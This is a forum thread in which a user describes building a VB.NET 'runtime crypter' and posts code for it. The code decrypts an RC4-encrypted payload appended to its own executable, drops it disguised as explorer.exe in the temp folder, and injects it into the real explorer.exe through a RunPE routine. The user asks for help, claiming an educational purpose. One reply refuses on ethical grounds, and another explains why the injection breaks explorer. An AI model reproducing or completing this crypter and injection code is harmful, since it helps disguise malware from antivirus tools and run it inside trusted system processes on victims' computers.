Runpe

[2pac]

I'm Making A runtime Vb.net Crypter
when ever i want to inject on explorer or taskmgr [runexe(fbyte, "C:\Windows\explorer.exe")] it gives me some kind of errors


when i inject vbc.exe it works fine ...

Part of my code :
--------------------------------
Dim temppath As String
temppath= System.IO.Path.GetTempPath
Dim s As String = temppath & "\explorer.exe"
Try
FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
thefileon= Space(LOF(1))
FileGet(1, thefileon)
FileClose(1)
Filetosplit = Split(thefileon, filesplit)
filezafter = rc4(Filetosplit(1), "2pac")
FileOpen(5, TPath & "\explorer.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
FilePut(5, filezafter)
FileClose(5)
Catch ex As Exception
End Try
fbyte= System.IO.File.ReadAllBytes(temppath& "\explorer.exe")
Try
psrun.runexe(fbyte, "C:\Windows\explorer.exe")
Catch ex As Exception
End Try
My.Computer.FileSystem.DeleteFile(s)
------------------------------------------------

[dunfiddlin]

Hmm. You are prevented from doing what, if it isn't flat out illegal, is certainly morally questionable. I can live with that!

[2pac]

i'm doing this for educational purposes only, please Help, other thing, If i used psrun.runexe(fbyte, temppath & "\explorer.exe") the file is already droped on temp, so i delete it using my.computer.filesystem.deletefile(tempath & "\explorer.exe"), when i go to taskmgr i found explorer.exe runing and it works fine but it's not injected into explorer of windows, only the file that i named explorer, Is it runing and executable into the memory??

[techgnome]

actually to be fair... It IS letting you do it.. .but you're then corrupting explorer... and since explorer.exe is the main UI application for windows... I'm a little surprised that your system is still up and running. When you inject your ... what ever it is you're injecting into it... it's wrecking the part of the system that is continuously running... so those errors aren't totally unexpected. At least for me.

-tg